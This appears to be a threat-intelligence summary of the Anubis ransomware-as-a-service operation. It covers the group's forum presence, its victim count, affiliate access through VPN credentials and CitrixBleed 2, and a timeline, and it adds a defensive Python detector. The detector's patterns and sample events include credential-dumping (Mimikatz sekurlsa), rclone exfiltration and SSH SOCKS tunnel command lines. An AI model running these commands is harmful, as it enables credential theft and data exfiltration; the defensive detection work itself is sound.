The Anubis ransomware operation has grown into a structured cybercriminal ecosystem that combines public branding, affiliate recruitment, and multi-platform extortion services. Researchers linked the group’s leak sites, onion infrastructure, forum accounts, and the recurring "Anubis Media" persona into a unified operation that promoted ransomware and data-extortion offerings across underground communities including XSS, BreachForums, ReHub, and RAMP, as well as X. The group reportedly listed 83 victims between February 2025 and June 2026, sought corporate access in the United States, Canada, Europe, and Australia, and advertised support for Windows, Linux, NAS, and ESXi environments with capabilities such as privilege escalation, shadow copy removal, network-wide deployment, and multiple encryption modes.
Separate incident reporting tied Anubis-linked intrusions to practical affiliate tradecraft centered on stolen VPN credentials and exploitation of CitrixBleed 2 (CVE-2025-5777) on Citrix NetScaler appliances. In observed attacks, operators blended into normal administration by deploying legitimate remote-management tools including ScreenConnect, Zoho Assist, MeshAgent, Remotely, UltraVNC, Total Software Deployment, and mRemoteNG, then moved laterally with RDP, SMB, and PsExec. They also harvested credentials with Mimikatz, browser password exports, and ntds.dit theft, used tools such as S3 Browser, rclone, s5cmd, WinSCP, and PuTTY for exfiltration staging, and in some cases established fallback access through cloudflared, authenticated proxies, and SSH SOCKS tunnels, including activity involving Synology NAS devices.
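As an added defender-side example (not from the original reporting), the script below tags constructed process-creation events against the tool families named above and flags hosts where several stages of the chain (remote-management tool, credential theft, exfiltration staging, tunnelling) co-occur on one machine. The patterns, the sample events and the threshold are assumptions for illustration; a single remote-management binary on its own is routine IT activity, which is why the hosts are scored on distinct categories rather than on any one match.

```python
import re
from collections import defaultdict

# Tool families from the Anubis affiliate reporting, keyed by stage of the chain.
# Patterns are illustrative assumptions, matched case-insensitively against the
# image path and command line of a process-creation event.
TOOL_PATTERNS = {
    "rmm": r"screenconnect|zohoassist|meshagent|remotely|ultravnc|winvnc|totalsoftwaredeployment|mremoteng",
    "lateral": r"psexec|psexesvc",
    "cred_theft": r"mimikatz|sekurlsa|ntds\.dit|ntdsutil",
    "exfil": r"s3browser|rclone|s5cmd|winscp|putty|plink|pscp",
    "tunnel": r"cloudflared|ssh\.exe.*\s-D\s",
}
COMPILED = {cat: re.compile(pat, re.IGNORECASE) for cat, pat in TOOL_PATTERNS.items()}

def classify(event):
    """Return the set of chain stages an event's image/command line matches."""
    text = f"{event.get('image', '')} {event.get('cmdline', '')}"
    return {cat for cat, rx in COMPILED.items() if rx.search(text)}

def score_hosts(events):
    """Union of matched stages per host; one RMM tool alone is routine, the chain is not."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]] |= classify(ev)
    return dict(seen)

def flag_hosts(events, min_categories=3):
    """Hosts on which at least min_categories distinct stages were observed."""
    return sorted(h for h, cats in score_hosts(events).items() if len(cats) >= min_categories)

# Constructed sample events (not real telemetry); hosts, paths and the IP are placeholders.
SAMPLE_EVENTS = [
    {"host": "FS01", "image": r"C:\Program Files\ScreenConnect Client\ScreenConnect.ClientService.exe", "cmdline": ""},
    {"host": "FS01", "image": r"C:\Users\svc\Downloads\mimikatz.exe", "cmdline": "mimikatz.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "FS01", "image": r"C:\Tools\rclone.exe", "cmdline": "rclone copy D:\\Shares remote:bucket --transfers 8"},
    {"host": "FS01", "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmdline": "ssh.exe -D 1080 -N user@203.0.113.10"},
    {"host": "WS22", "image": r"C:\Program Files\Zoho\ZohoMeeting\ZohoAssist.exe", "cmdline": ""},
    {"host": "WS22", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for host, cats in score_hosts(SAMPLE_EVENTS).items():
        print(host, sorted(cats))
    print("flagged:", flag_hosts(SAMPLE_EVENTS))  # prints flagged: ['FS01']
```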

Timeline (8 reported events):
The Anubis ransomware-as-a-service operation was formally announced on the RAMP cybercrime forum in February 2025 following its emergence from the late-2024 Sphinx rebrand.
Arctic Wolf observed some Anubis-linked intrusions attempting to establish alternate outbound access using cloudflared, authenticated proxies, and SSH SOCKS tunneling, including activity involving Synology NAS devices.
Across the 2026 cases, Arctic Wolf observed Anubis affiliates abusing legitimate remote administration tools for lateral movement and blending into IT activity, then using credential theft and cloud-transfer tools such as Mimikatz, rclone, WinSCP, and S3 Browser before encryption.
Arctic Wolf reported that multiple 2026 intrusions tied to the Anubis ecosystem used two main initial access paths: valid VPN credentials and exploitation of CitrixBleed 2 (CVE-2025-5777) on Citrix NetScaler appliances.
Arctic Wolf reported that the Anubis ransomware-as-a-service operation emerged from a late-2024 rebrand of Sphinx and subsequently operated through affiliates.
StealthMole reported that by June 2026, Anubis had publicly listed 83 victims and maintained a unified ecosystem of leak infrastructure, communication channels, and forum identities centered on the Anubis brand.
StealthMole found that the recurring persona "Anubis Media" was used to promote the operation’s brand, services, and recruitment efforts across XSS, BreachForums, ReHub, RAMP, and X. The group advertised ransomware and data-extortion services and sought corporate access in the United States, Canada, Europe, and Australia.
StealthMole reported that Anubis publicly listed 83 victims between February 2025 and June 2026; February 2025 is the earliest visible leak-site activity in the source material.
Sources (3 references):
thehackernews.com
arcticwolf.com
stealthmole-intelligence-hub.blogspot.com